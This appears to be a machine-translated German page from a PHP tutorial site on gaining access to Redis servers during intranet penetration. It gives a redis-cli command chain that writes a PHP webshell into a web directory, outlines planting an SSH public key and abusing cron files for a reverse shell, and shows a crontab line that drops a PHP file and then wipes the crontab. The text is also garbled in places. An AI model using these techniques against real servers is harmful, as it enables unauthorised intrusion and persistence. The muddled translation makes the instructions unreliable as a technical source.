Redis-Datenbank ist in der Intranet-Penetration relativ häufig anzutreffen. In Kombination mit dem aktuellen Nutzungsprozess:
Redis auf dem Intranet-Computer herunterladen und entpacken, keine Installation erforderlich
A) Unter normalen Umständen kennen Sie den Pfad und schreiben die Shell
./redis-cli -h IP config set dir /home/wwwroot/default/ config set dbfilename redis.php set webshell " phpinfo(); ?>" save
B) Verwenden Sie den öffentlichen Schlüssel, um sich ohne Passwort anzumelden. 1 Generieren Sie den öffentlichen Schlüssel lokal. 2 Verwenden Sie Redis, um den öffentlichen Schlüssel zu sichern Redis-Maschine C) Verwenden Sie die Linux-Aufgabe, um die Shell neu zu binden.
1 /var/spool/cron ist die standardmäßig geplante Aufgabe auf der Linux-Maschine Der Dateiname ist Benutzername 2. Redis setzt dbfilename auf den oben genannten Wert, um die Shell direkt zurückzuspringen.
Grob gesagt werden die oben genannten drei Methoden hauptsächlich verwendet, um die Berechtigungen des Redis-Servers zu erhalten Beginnend mit Root-Berechtigungen sind die Berechtigungen sehr groß.
Aber es wird immer wieder zu unerwarteten Situationen während des Penetrationsprozesses kommen, oder?
Die erste Methode: Wenn die Redis-Datenbank zu groß ist, was dazu führt, dass das PHP-Pferd den Grenzwert überschreitet und 500 nicht direkt analysiert werden, können wir über den dritten Befehl < ein Pferd in das Webverzeichnis schreiben 🎜>
*/1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r
Häufig verwendete Datenbanksoftware
Was sind In-Memory-Datenbanken?
Welches hat eine schnellere Lesegeschwindigkeit, Mongodb oder Redis?
So verwenden Sie Redis als Cache-Server
Wie Redis die Datenkonsistenz löst
Wie stellen MySQL und Redis die Konsistenz beim doppelten Schreiben sicher?
Welche Daten speichert der Redis-Cache im Allgemeinen?
Was sind die 8 Datentypen von Redis?
![[Web-Frontend] Node.js-Schnellstart](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
